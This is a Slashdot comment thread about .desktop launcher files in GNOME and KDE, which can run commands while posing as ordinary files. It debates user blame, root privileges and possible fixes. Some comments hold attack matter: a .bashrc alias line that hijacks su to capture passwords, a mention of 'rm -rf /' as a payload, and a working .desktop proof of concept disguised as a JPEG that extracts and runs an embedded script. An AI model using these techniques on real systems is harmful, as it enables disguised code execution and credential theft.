Malware Threat To GNOME and KDE

commandlinegamer writes "foobar posted on his blog recently about 'How to write a Linux virus in 5 easy steps,' detailing potential malware infection risks in the .desktop file format used by GNOME and KDE. This is not a new threat, and it appears to still be a risk, as discussions in 2006 did not seem to come to any firm conclusion on how to deal with the problem." There's a followup on LWN.

Solution

[Spazztastic]

Use Linux... wait, shit. We need a new answer, guys.

Re:Solution

[zappepcs]

The answer is the same one that has been valid for .. well, since the advent of computers. There will always be vulnerabilities. The best you can do is be aware, vigilant, and choose software that has less vulnerabilities and whose writers work hardest to correct the problems fastest. Arguments can be made for or against Linux based on those criteria but it remains a very strong choice over Windows or Apple. The more popular Linux becomes on the desktop, the more chances there will be vulnerabilities. Now is the time for F/OSS coders to start working extra to ensure there are as few as possible.

If you write code, you know that you've left open areas where an exception will cause a problem for any number of reasons. it happens. period. So far, GNU/Linux has cleaned up quickly and well on most things. The struggle continues. That is the answer.

Re:Solution

[Lumpy]

Have a brain when using the PC.

It works for all operating systems. Viruses and Trojans require the user to not think and execute things willy-nilly. Having a brain reduces the infection vectors drastically.

Every "expert" I have met that has been infected was downloading and using warez unsafely. Every regular use I have met that was infected simply clicked yes to every dialog box they did not want to bother reading and understanding.

The OS does not matter, having educated and competent users does. Have to add that competent, I have seen educated users go and click on crap without reading or thinking.. It requires competence.

Re:Solution

[Spazztastic]

Having a brain reduces the infection vectors drastically.

I forgot sarcasm tags when starting this thread, but there's also many other problems outside of "not having a brain." Unpatched flaws in your operating system, people still running IE6 and opening a JPEG with a script embedded, etc. One can be very intelligent at something completely unrelated to computers and still get infected purely because of a popup and an unpatched system.

Not everybody knows to run windows update or to update their Ubuntu installation even if it warns them, because it's usually being inconvenient. Usually it's why I set it to do it automatically for users or they won't.

Re:Solution

[Ed+Avis]

Have a brain when using the PC.

This has very little to do with user stupidity. Indeed, users should not execute things willy-nilly, but it's surely okay to open a file and look at its contents? If you think that is inherently unsafe then users must be prohibited from receiving email attachments (or downloading from web pages) altogether.

In this case there are no warning dialogues to click through, no unusual steps. All that happens is you save a file and then double-click to open it. There is no way to see in advance that the file is unsafe, and it can adopt any icon and name it wishes, so in the user interface it is *indistinguishable* from a legitimate desktop icon such as the trash can.

It gets a laugh on Slashdot to castigate 'stupid' users, but if the system does not provide users with the information needed to make an informed choice, then the system is at fault.

Re:Solution

[Ed+Avis]

The best you can do is be aware, vigilant, and choose software that has less vulnerabilities and whose writers work hardest to correct the problems fastest.

Which in this case is unlikely to be GNOME or KDE, since this attack has been known for several years and absolutely nothing has been done about it (it's "expected behaviour").

Re:Solution

[zappepcs]

I tried to make it a choice by the end user as to which is less vulnerable. MS products have/had similar issues by length and criticality. So if any and all of your choices can and will have such vulnerabilities, use other criteria for your choice.

On a side note: Worse than having a vulnerability in the code base for several months or years is having it left there intentionally, and marginally worse is when users ignore the patch when it is provided. With Linux patches are free. With Windows products you need to be a legal registered user and/or have paid for updated anti-malware software. Consequently it costs you more to apply fixes for some OSes compared to Linux.

So, in the end it is still down to the user to do their part. No matter what efforts the coders put in, if the user fails the malware will spread.

I'm not apologizing for bugs/problems in Gnome/KDE code. I'm simply saying that such an event only makes it software. When those packages continue to have such errors on a regular schedule and with end effects that MS has tortured the world with, then it's reason to complain.

Re:Solution

[bigstrat2003]

With Linux patches are free.

And they are with Windows as well. Come on, it's more than a bit ridiculous to expect Microsoft to supply patches to people who pirate their software. If you've bought your copy of Windows, patches are free. There may be a bug with validating your copy, but that's also a mistake, not by design.

Re:Solution

[zappepcs]

My poorly stated point is that those pirated copies are not being patched appropriately and thus represent a larger target for malicious software authors, making Windows a little bit less desirable from that point of view.

Re:Solution

[pipatron]

Windows security patches are free for pirated versions of Windows. Don't ask me how I know this...

Re:Solution

[BluenoseJake]

Actually, it makes people who are too cheap to pay for Windows, but to lazy or uninformed to use OSS less desirable, not Windows.

Re:Solution

[jank1887]

TRS-80, here we come!

Re:Solution

Remember the Melisa "I Love You" virus that first came out maybe a decade ago?

Ha ha!, I thought, How stupid do you have to be to open a file that is sent to you and all it says is "Hey, look at this picture!".

Certainly, it should be quite suspicious. No comments. No "Hi, how are you.". Plus, the news was already out that you should be very, very careful.

Well, my workplace, which was full of some very talented and bright developers got infected. Our whole network slowed to a crawl as more and more emails were being sent to everyone. I was receiving hundreds of emails each minute. One of our top developers admitted he was the one that caused the infection. He was actually waiting for his friend to send him a file, and when the virus mail came, he clicked on it.

"Using your brain" doesn't always work. I've talked to brilliant developers who found themselves suddenly caught in a phishing scam.

Even I was almost caught. I received a phone message from an 800 number about a problem with my credit card. I called back the 800 number, to find out what the problem was.

The first thing they asked for was my credit card number. My son started screaming at me not to give the number and I relented. We did a Google search and to my surprise, he was right. It was a phishing expedition.

Remember: I wasn't called. I called an 800 number. The person didn't simply answer "Hello", they identified themselves as my credit card issuer without any prompting. If my son didn't stop it, I would have given some stranger who was masquerading as my credit card issuer my credit card number.

The book "The Design of Everyday Things" talks about a software program (pre-Windows) that had the user press the key (sometimes called by the right side of the keyboard on some occasion, and other times, the key by the numeric keypad.

Users were having severe issues. The developers blamed it on the users because the directions clearing distinguished between the two keys. Even the users felt stupid because they felt they should have known better. In the end, a UI designer stepped in and eliminated this distinction between the two keys, and solved the problem.

Sometimes, "Use Your Brain" is simply an excuse to allow bad design to be ignored rather than fixed. If enough users are having difficulties with a certain situation, it isn't enough to castigate them on their lack of intelligence.

Re:Solution

[Just+Some+Guy]

Come on, it's more than a bit ridiculous to expect Microsoft to supply patches to people who pirate their software.

Remember that story about vaccinations the other day? Herd immunity is vitally important, and patching illegitimate installations makes the world safer for legitimate users. This in turn goes a way toward improving Microsoft's security reputation to something greater than Swiss cheese.

Re:Solution

[Ed+Avis]

Yes, I do believe it should be safe to *open* any file from any source. If double-clicking a file to open it is unsafe, that needs to be fixed. Look at the security alerts for free software: a large proportion are things like 'a bug in the file decoding might allow an attacker to overwrite the stack by making a specially crafted PNG file'. These are treated as security holes and fixed, because it must be safe to merely *open* and view a PNG file (or whatever) from any source.

The idea that some files are 'bad files' which you should not even open to look at is a screwed-up view of the world that comes from Windows, where the OS and applications don't usually bother to make any distinction between opening and executing. On a sensible system, there is no reason to be afraid of using email and viewing attachments. I have absolutely no fear about saving any attachment from any source and opening it in emacs to view it. The desktop environment can and should provide the same safety.

To continue your analogy: the bug is that currently, with .desktop files, GNOME doesn't give you any way to see what it is apart from putting it in your mouth. Just as with any other kind of file, it should just display the contents for viewing, and not try to taste it unless the file is explicitly marked executable.

Re:Solution

[Ed+Avis]

The vulnerability is in the way the desktop environment hides information from the user so you have no way (even if you are an experienced and responsible user) to avoid executing the malware. You get an attachment by mail, you just save it to look at it and see what it is (a one-click, and expected-safe operation) but when it appears on the desktop background, it's disguised as something else (the .desktop file can choose any icon and name it wants), and double-clicking to view the file in fact *executes* the code without asking you.

What should happen: you save the file; if you chose to save it to the desktop background it appears there, but because it's not marked executable it will not run when you double-click it. Instead the file contents open in a text editor, or some other fairly boring but safe action.

Re:Solution

[jonadab]

> You get an attachment by mail, you just save it to look at it and
> see what it is (a one-click, and expected-safe operation)

You do *WHAT*?

> but when it appears on the desktop background

Wait, not only do you deliberately save random unidentified email attachments, you save them to the DESKTOP?

Whatever is wrong with you, it's no little thing.

> What should happen:

What should happen, when you get an email attachment and you do not know what it is, is that you either ignore it, or if you have a certain morbid curiosity you maybe save it in /tmp and look at it in something that will treat it as random data (e.g., a hex editor) or use a file-magic utility to determine what kind of content it has in it.

Under no circumstances should an unidentified email attachment ever get anywhere near your desktop. If you don't understand this, maybe you should let your network administrator run that attachment stripper on the MTA like he keeps threatening to do every time he has to rebuild your workstation.

With that said, I do think .desktop files are an inherently bad idea, although they're pretty irrelevant to me since I don't even have nautilus in my session. It's a resource hog, and I never use it. I haven't had any desire to use a graphical file manager since I discovered tab completion sometime in the nineties. This does mean my background is a plain color instead of a pretty picture, but since I generally have a lot of windows open I never *see* much of the background anyway. Instead of icons on the desktop, I keep launchers on the left-side panel, and in drawers.

Frost piss

[digitalunity]

Interesting article. Cliff notes for those who don't read articles: KDE & Gnome desktop icons can contain malicious commands.

The common defense that "well at least linux malware can't get root privileges" isn't much of a defense. For many users, the most sensitive documents they have are owned by themselves.

Re:Frost piss

[Todd+Knarr]

It does make a big difference in clean-up, though. With the malware not being able to get administrative privileges, it can't get into root's environment. That means that you can log in as root and the malware won't get a chance to take over, and then you can safely use all your scanning and clean-up tools without having the malware disable or circumvent them. Contrast this with how thoroughly rootkits can hide on Windows systems.

It's still dangerous, make no mistake. Once the malware's running locally, it can try local exploits to escalate to root access. But there's a lot fewer of those on Linux systems than on Windows, and they're a lot harder to exploit, and anything that doesn't successfully exploit them will be much easier to detect and remove. This is a significant win compared to Windows.

NB: nothing will protect a system from it's owner's stupidity. If the user insists on being willfully stupid, they're in a position to bypass any and all protections on the system. The only protection is to keep them away from the keyboard.

Re:Frost piss

[Fallingcow]

It does make a big difference in clean-up, though. With the malware not being able to get administrative privileges, it can't get into root's environment. That means that you can log in as root and the malware won't get a chance to take over, and then you can safely use all your scanning and clean-up tools without having the malware disable or circumvent them. Contrast this with how thoroughly rootkits can hide on Windows systems.

Really though, especially if we're talking about my personal desktop or laptop, if I notice any kind of infection I'm just going to format->reinstall. It is not remotely worth my time to verify that the virus did not achieve root privileges when reinstalling will take care of the problem much more quickly and thoroughly.

I've used Linux for years, but I still don't get the "OMG don't run as root!" obsession. I don't run as root exactly (I like being under /home rather than /root) but I give myself nearly-root permissions and remove password prompts from everything that I can. Why? Because I'm the only one who uses my laptop, all the stuff I care about is in my ~/ folder, and the discovery of any virus of any kind whatsoever is going to mean an instant format->reinstall anyway.

On servers? Sure. Multiuser workstations? Sure. At home? Running as a regular user is just way more hassle than it's worth. Oh no! The virus got in to the /boot directory! So what? Who gives a shit about /boot? I care about ~/Music or ~/Downloads far, far more.

Re:Frost piss

[psetzer]

Escaping notice is the most important part of keeping malware on system. After it's found, the question is more about how painful it is to get off the system than whether it's going to get removed. Since modern malware authors want their software to stick around in the background for as long as possible, they just avoid doing anything outrageous and let the zombie send out a trickle of emails.

Experience with Windows users shows that the average end user who's willing to click on something like the author was talking about isn't going to get suspicious and won't suspect something two levels deep in a dot folder with an official/cryptic sounding name. They can be brazen and call it 'smtpmmd' for SMTP mass mailer daemon and it'll still probably slip under the radars of at least a few people who know how to look at their active processes. The only real solution is an automated searching tool and at that point you're doing the same thing as all the Windows AV programs, just with a somewhat easier time of it.

Re:Frost piss

[Todd+Knarr]

I advocate the "Don't run as root." position for two reasons. One, it builds good habits from the start, both for users and for software vendors. It gets users used to running as ordinary users, and conditions them to expect the system to function correctly without administrative privileges except when explicitly doing administrative tasks. We've seen on Windows how many problems keep sticking around simply because of habits users have developed over the years. Inertia works, so put it to good use instead of bad. If you teach users good habits initially, they're likely to stick with them. And it gets software vendors used to living in a world without administrative privileges. When most users expect not to need admin privileges to use software, their reaction to software that expects admin privileges is to go "WTF? Why do you need that again?" and to go with other software if the vendor insists on requiring the user to break their existing habits (users are lazy and don't like changing their ways, remember). That yields a feedback loop: vendors produce software that doesn't require admin privileges because users react badly to stuff that demands admin rights for no good reason, and users react badly to software that demands admin privileges for no good reason because 99% of the software they work with "just works" without admin privileges being needed.

It's also a safety net. If I manage to bork up my user account, root's still sitting there untouched and I can still log in and repair the damage. It's like having a spare set of car keys in your wallet: you won't lock yourself out often, but when you do it's an incredible relief to pull out your wallet and find you don't have to call for help.

Virus?

[Carewolf]

It relies on the user downloading saving and running a shell-script. The only trick here is that in this KDE/GNOME form the user does not need explicitly to add execution rights on the file.
Still hardly a virus, more like a gun without a safety switch. It is one step easier for someone to shoot themselves this way.

Interestingly if we wish to reinforce the 'chmod +x' scheme, desktop files should need a +x (or some other non-MIME property) to be treated specially by GNOME and KDE. Might be an idea.

Re:Virus?

[TheLink]

Since we're talking about desktop computers, who in their right mind cares about "installs"?

I care more about user data.

I can get "install" data from the DVD/CD and Distro update service.

But I cannot always retrieve the most recent user data from backups.

Losing a day's work or even an hour's work can be more pain than having to reinstall the OS.

Of course it's different if you are one of those users that installs an operating system just for the purpose of playing with themes, etc but not doing any significant work.

Re:Does not work as advertised

[argiedot]

I am a bloody fool. I managed to read the article without reading the article. It works.

Re:Stay away from root

[argiedot]

Well, the author here seems to emphasise that that won't help because on a single-user account, your priority is your data. If you lose your system but your data isn't compromised, you lose very little that can't be replaced. If you lose your data but your operating system is functional, you have lost nearly everything of value.

Wow, please mod this to -1

[Dripdry]

Sorry, wrong thread, too many tabs.

Re:Protect your self with encryption

[JesseMcDonald]

Why do shortcuts need to have the ability to run code?

The shortcut only contains parameters for the path to the application and a list of parameters; it doesn't run any code itself. The problem is that the application can be (e.g.) /usr/bin/perl, and the parameters "-e 'perl code here'". Removing this ability would seriously impact the usefulness of the shortcuts.

The real issue is that the DEs are blindly trusting a non-executable file of unknown source to provide this information. The solution has already been suggested: turn all .desktop files into scripts (via a #! line, which is already valid comment syntax), mark them as executable, and have the DE run them like any other executable file. Non-executable .desktop files which link to applications would be displayed as usual, but would be treated as documents rather than launchers.

Did you even RTFA?

[brunes69]

He is not talking about shell scripts at all. The whole point of the article is a .desktop file does not need to be +x to execute it, KDE and Gnome execute commands in it automatically regardless. So all they have to do is save it and click on it.

Re:Did you even RTFA?

[argiedot]

Yes, I read it again after it struck me that it seemed rather odd that something so obvious would be called a 'security flaw'. You are right and I am wrong.

Re:Did you even RTFA?

[styryx]

You are right and I am wrong.

W...w...wh....what the fuck just happened?! Am I on the internet still?

Great news

[AlHunt]

So we have a long-known, unaddressed vulnerability and easily accessible instructions on writing a Linux virus.

Does this mean Linux is finally "ready for the desktop"?

Re:Great news

No, it means malware is finally ready for the .desktop

Re:Great news

[gzipped_tar]

I get your humor, but this may be the only way for Linux to claim the "year of Linux on the desktop".

I mean bug-to-bug, bullshit-to-bullshit compliance to MS Windows. People are fed crap to grow up and they asks for more crap. At least this is what I think I got from GNOME.

I use to have a sig. saying "so this is how Linux dies -- with thunderous applause." I changed it after being protested by someone as AC (and partly in fear of being sued by LucasFilm ;) I've always feared that the year of Linux on the desktop would be the year of its death, because the line between "being popular" and "lowering standards to cater to the mass" is so easily blurred.

Luckily I've escaped to using minimal WMs and I'm not that dependent on the GUI.

Anyone can think I'm an elitist troll and mod me down accordingly. I'm open to mods and criticism because I know I may be wrong. OTOH I mean what I said. I like Linux and I'll be more than happy to see it prevailing. However, according to the current computer-literacy of your typical desktop user I can only say that the desktop market is not ready for Linux. Shovelling it down your average user's throat (and trying to prioritize "making it a less painful process") could result in the degradation of Linux.

Re:Great news

[Saint+Stephen]

You really shouldn't call your dad a "test case."

Today's file managers are going wild...

[gzipped_tar]

Everyone is trying to mimic the brain-dead M$ Way.

Just think of the idea. You click on the icon (who knows what the picture would suggest) and the file path is passed to an "interpreter" (be it oowriter, emacs or python or ld.so) you may not know. This is a terrible idea to begin with.

That's why I use file managers almost only for bulk copying / moving. And I still prefer the CLI if the file names are regular-ish enough.

OpenBSD

[jgtg32a]

Linux noobs you should be using OpenBSD from a shell.

Re:Protect your self with encryption

[JesseMcDonald]

That would require a blacklist of script interpreters, which could only be a temporary solution. No blacklist is ever going to cover all possible attack vectors. Similarly, checking for particular parameter length will either have too many false positives or fail to catch potential attacks. E.g., what if the command was /bin/rm and the parameters were "-rf /"?

Requiring the executable bit would make for a more permanent solution to the problem.

Re:Linux Users Don't Backup?!?

[digitalunity]

Don't be so shortsighted. The issue isn't you losing your files. It is that others can obtain your files.

Just because malware doesn't have root privileges doesn't mean it isn't capable of stealing valuable information from you.

Re:Protect your self with encryption

[Ed+Avis]

Yeah it's pretty straightforward: if the executable bit is not set then the file is merely *displayed* as a plain text file. If the executable bit is set then it is *run*.

That means you cannot simply save an attachment from a message and run it. You can however display it, which is fine.

Everything works like this except for .desktop files, which because of an oversight, default to *running* on double-click even if not marked executable. Hence the attack vector. It is made nastier by the fact that .desktop files can disguise themselves with a name and icon of their choosing.

Re:Not really news...

[geantvert]

The first problem is indeed that a desktop file does not require the executable bit to be executed (from Nautilus) by double-clicking it.

The second problem is that the file content specifies it icon, name and tooltip regardless of the filename of the desktop file.

For example, a very efficient way to fool people could be to disguise the desktop file into one of the default icons of the desktop (Trash, Computer, Home, ...)

For the virus writer the only problem is to get the desktop file to be saved in the Desktop directory.

Humm... Guess what is the default directory of most applications for saving uploaded files? I give you an hint. The name starts by a 'D'.

Even better, it is possible to specify that the Desktop is the HOME. I haven't checked recently but that I remember that this used to be the default in Ubuntu.

My advice is simple: Start gconf-editor and disable the configuration key /apps/nautilus/preferences/show_desktop to get rid of all desktop icons.

Lame

[DesertBlade]

It is the equivalent of downloading a Picture.jpg.bat that deletes *.* from windows. Windows hides the extension (.bat) so it would be easy to double click on it and bam no more files. Yes the icon would look different.

I have previews turned on in Gnome so I can actually see the picture before I run the code.

Re:Protect your self with encryption

[blue+trane]

Nah, you don't speak for me.

Re:Stay away from root

[emocomputerjock]

Data theft is much more nefarious and dangerous than data destruction and usually the primary goal of anyone attempting to exploit a system. Backups are great, but using personal data for financial gain is the name of the game nowadays.

Fast fix

[Todd+Knarr]

Fast, simple fix for this: make .desktop files scripts. Start them with "#!/usr/bin/false" or something so that if just executed from the command line they don't do anything, just fail. Gnome and KDE expect all entries to start with that and be executable. If they're executable, they act normally. If they aren't executable, the contents or their properties are displayed instead. If they don't start with the hash-bang line, the interface prompts the user for whether they want to display or execute the entry.

A fancy elaboration could register a binary-format handler (similar to the one Wine registers) that would recognize the "[Desktop Entry]" starting the file as a binary format and, if the file was executable, trigger the interface to act on the entry. That could remove the need for the hash-bang first line, but there's some other potential holes I'd have to analyze for impact.

Re:Fast fix

[JesseMcDonald]

Why not just make a proper interpreter for .desktop files, and use that in the first line ("#!/usr/bin/desktop-launcher")? Then the DEs could always run executable files, and always display non-executable files. As a bonus, you could run launchers from the command-line.

You are wrong

[SmallFurryCreature]

I am dealing with a user at the moment who just isn't that bright. It is not that she is a moron, she just doesn't think. Somethings she does right, she gets her wallpapers through googles image search and uses firefox after my suggestion.

But she also wants animated cursors and finds them and happily installes them. Cursor Mania.

She just doesn't get, yet, that the internet has two kinds of free and that the more something shouts it is free the less likely it is. How do you explain that firefox is free and safe but cursormania is free and not safe?

The problem is not so much that some people are stupid but that they lack a healthy dose of cynasism, they forget to question things. And that is pretty to stupid.

The system can't protect against this unless you want to life in the nanny state. Women are free to go with convicted wife-beaters unless you want the state to decide your partner for you. People can install spyware unless you want the system to decide what you can install.

For some reason people like you want software to do things you would NEVER accept in hardware. Would you really want a powerdrill that constantly checked wether you where drilling in the factory approved substances, at the right angled, under the right conditions? A screwdriver that refuses to be used as a hammer?

At some point users must accept a responsibilty to operate their equipment responsible themselves and accept that if they make mistakes, they are the ones to blaim.

You know what my solution has been to fix 99% of friends requests to fix their windows PC? Re-install. Whipe the crap and sooner or later they either figure out that "mmm once I downloaded those free smiley's my computer starts to act like a piece of crap, maybe these two things are connected" or at least find someone else to help with their crap PC's.

Lets face it, after 30 years I have started to realise that no amount of suggestion is ever going to result in girls actually giving any of the sexual favors they seem to promise when they ask you to fix their laptop.

Re:You are wrong

[Ed+Avis]

What you say is all true but it's not relevant to this particular problem, which is that *all* users, even sensible and cautious ones, can be easily tricked into running an executable because the user interface makes it look exactly like an ordinary file. You or I would also be vulnerable.

And BTW, I suggest you kiss her first, and fix the laptop afterwards.

Re:You are wrong

[javilon]

Lets face it, after 30 years I have started to realise that no amount of suggestion is ever going to result in girls actually giving any of the sexual favors they seem to promise when they ask you to fix their laptop.

It seems to me that while they are a bit slow with technology you, on the other hand, are a bit slow at making the (lack of) connection between "fixing laptop" and "getting laid" when social interaction is the issue.

Re:You are wrong

[McDutchie]

She just doesn't get, yet, that the internet has two kinds of free and that the more something shouts it is free the less likely it is. How do you explain that firefox is free and safe but cursormania is free and not safe?

I think I would try that by explaining the difference between free as in freedom and free as in "we will sell your soul to our advertisers".

Not a virus?

[pyrr]

I noticed in the TFA that the author claimed that some folks were claiming this didn't meet the definition of 'virus'. It's funny how the definition seems to have changed. I'd have to say this sort of exploit is technically an old-school virus, the sort that is pretty much dependent on a gullible end user to do something stupid, at which point it could dig-in its tentacles. Most modern Windows viruses, including the fake-anti-malware malware that seems to be going around lately, don't require any user interaction whatsoever to get infected.

When I think of a "virus", well, that's just malicious code, it's something designed to do some form of damage. It's malware-- software that's up to no good. That doesn't describe the delivery method.

I can see how folks want to draw a distinction based on the severity of the exploit (namely the extent of the potential damage to the system and the level of user interaction), but claiming this isn't a real virus is just silly. Maybe a new definition for the more severe sorts of malware is needed.

Re:Linux Users Don't Backup?!?

[ChienAndalu]

Just because malware doesn't have root privileges doesn't mean it isn't capable of stealing valuable information from you.

I sometimes wonder how difficult it would be to obtain the root password from somebody. If the PATH variable has a path that the user has write access to, what's stopping the malware to put a "su" wrapper into that directory? Next time you enter su, the wrapper captures your password, logs you in and deletes itself.

I also think that a keylogger for X11 wouldn't be too difficult to implement.

Re:Linux Users Don't Backup?!?

[ChienAndalu]

On second thought, you don't even need that. The malware just has to do

echo "alias su=/tmp/evilwrapperscript" >> ~/.bashrc

and you're finished

Re:Not really news...

[extrasolar]

The "Look! nude pictures of [latest chick seen on a hollywood blockbuster] ! If it doesn't open, save and execute" routine is pretty cross-platform. It relies on the Stupidity 0.99995b RC12 Gold API, and it is here to stay.

Which is wrong and has always been wrong by the way. And it's not "open, save, and double click" not "open, save and execute".

When someone double clicks an icon that signifies it's an image file, that action should not execute an arbitrary command on your system. There needs to be some sort of guarentee that the icon chosen to represent a file actually represents the file. There is no guarentee with .desktop files. This is a bug damn it, not a feature!

And you have a strange definition of "stupidity" which goes something like this: "Not paranoid enough about the interface because it is possible for attachments to deceive the user as to their nature." The interface is broken, that's all there is to it. But it doesn't surprise me that your average GNU/Linux user doesn't think that a broken interface is a problem; obviously we're dealing with the stupid user again who hasn't learned the proper degree of paranoia about what the interface depicts to the user.

PS: Just so you know, I'm a huge free software supporter. The great thing about open development is that bugs, when found, often get fixed, but this mentality falls short of the interface and real usability bugs. People, even advanced GNU/Linux gurus, succumb to usability pitfalls, when you're tired or in a hurry or intoxicated or who knows what. I'm not saying we should prevent the user from doing anything harmful to his system (a common strawman on this forum). But it should be obvious to everyone except for this site that if the icon shows that it's a picture file or a spreadsheet or whatever else, that that is what the interface should be. The RIGHT behavior is that the icon representation must reflect truly what is being represented.

Re:Linux Users Don't Backup?!?

[Knuckles]

True. Though just as the first case can be prevented by mounting /home (or possibly /home/) noexec, this once can be prevented by doing same with /tmp

Not PEBKAC

[TheLink]

A lot of people claim it's a PEBKAC problem, but I STRONGLY disagree.

If you expect people to figure out whether a file is safe before "launching/opening" it, then you are expecting people to solve something arguably harder than the "halting problem" (which I hear is very hard, but still easier in comparison since you are given both the description of the program AND the finite input!).

I propose that:
1) Compliant programs be allowed to _request_ what they want to be able to do (by either using a finite and manageable set of standard sandbox templates, or in special cases a custom sandbox template - which can be audited and digitally signed by 3rd parties).
AND THEN
2a) The user be asked whether the request seems reasonable e.g. Fun Screensaver requests "Standard Screen Saver" privileges vs WARNING!! Fun Screensaver is requesting "Full System" privileges!
AND THEN
3) If approved, the operating system then enforces the requested template, so the program can only do whatever possible within the template sandbox.

Do note there's also:
2b) The request is silently approved if the OS has been told to remember the user's prior approval of the program and template (and the alt/whatever key was not held down while launching).
2c) The request is silently approved if the program and requested template is signed by trusted parties (e.g. OS vendor), and the alt/whatever key was not held down while launching.

I have proposed this concept before to Ubuntu and Suse, see:
https://bugs.launchpad.net/ubuntu/+bug/156693
(FWIW I've actually also suggested this to apple).

It'll be hard to implement, but I suspect it's easier than getting "Joe Sixpack" to reliably solve something harder than the "halting problem".

Lastly, much windows malware REQUIRE a brain to participate in order to spread. It's often harder to write malware that does not require a brain to spread. Many here think they're so smart, but would they really know what a devious binary or perl script actually does? Have they ever looked at the Underhanded C entries?

Re:Not PEBKAC

[TheLink]

While Vista does sandboxing AFAIK it doesn't have templates for sandboxing (which to me are an important part for making them user manageable).

Does it provide the user with an accurate concise idea of what the program's required privileges are?
Does it allow the user to save the decision preferences for an app+template pair?

Vista's UAC as implemented seems more like a way for Microsoft to shift blame to the user for security problems.

Re:Not PEBKAC

[Eskarel]

Actually it's not what Vista does. Vista says "application X is either requesting system access, or appears as if it might request system access do you want to grant it".

It doesn't allow you to define which types of system access you want it to have(I might want my screensaver installer to be able to access the settings which allow it to set the screensaver I just installed as my default screensaver, but not to arbitrarily execute code or access other system settings for instance), nor does it allow you to provide long term approval for known applications.

UAC is a massive improvement over the old system(it allows users to elevate permissions simply on demand), but it's got a whole bunch of flaws and isn't this system.

They won't listen

[diegocgteleline.es]

I filed a bug warning of this security problem on March, 2005. Final answer of the developers after taking it to the freedesktop lists: WONTFIX. So, what's the point of reporting bugs?...

The fix is easy, only interpret .desktop files IFF they have the +x bit set (IOW, apply the regular UNIX semantics). It shouldn't take more than a few lines in Gnome and KDE to fix it, and distros can easily modify the scripts to make all the .desktop files +x-

Re:They won't listen

[Thinboy00]

Well... file a God-bug. That should fix it!

Re:They won't listen

[Eskarel]

Well that's not actually a fix. If you're getting the file there by social engineering you can quite easily get the user to set permissions on the file to allow execution(you've already convinced them to download it haven't you).

If you've found a vulnerability allowing you to put the file there without user intervention, then you can easily change the permissions at the same time.

Re:They won't listen

[Eli+Gottlieb]

The only solution to social engineering of the user is to have a more knowledgeable system administrator. This just ups the ante on the social engineering.

No system can defeat social engineering.

Re:Protect your self with encryption

[JesseMcDonald]

The programs responsible for creating .desktop files would set the execute bit automatically, so the change should be more or less invisible. The only case where you'd have a non-executable .desktop file would be if it was saved from a program which does not normally create shortcuts: an e-mail attachment, something downloaded from a web site, etc.

Payload within .desktop

[FxChiP]

Has anyone mentioned the possibility yet of embedding the payload (malicious script, etc.) within the .desktop file? The specification allows for commenting, after all, which is a free way to embed text -- the question then merely becomes one of extracting the text from the "comments" at the tail end of a .desktop file, outputting it to its own file, and executing.

To wit, in a file called blah.desktop:

[OMGMALICIOUS]
Version=1.0
Type=Application
Name=HOT XXX JENNA JAMESON.jpg
Icon=jpegicon.png
Exec=bash -c "tail -n +7 blah.desktop | sed -E 's/^#(.*)$/\1/g' > malscript; chmod 777 malscript; ./malscript"
##!/bin/bash
##
## OMG MALICIOUS
#
#echo OMG HI PWNED J00 > pwned

Which would then open the door to other types of scripts being embedded within the .desktop file, such as Python or Perl (the latter of which is probably the even more widespread of the two!)

This method has a few benefits over the described one, including: offline execution of malware, no further download beyond the .desktop required; semi-easy modification of the embedded script (you can add or remove lines as you wish and even leave comments in thanks to the tail and sed commands used); and the embedded file could easily make the .desktop file it's contained in reach file size levels (something I, personally, look at with certain files) roughly equivalent to the file it's attempting to masquerade as. Theoretically, so long as you remembered to escape things properly, you could possibly even include binaries within the .desktop file in this manner(!!!!).

This of course comes no closer to the holy grail that is root, but still an interesting twist on the same process...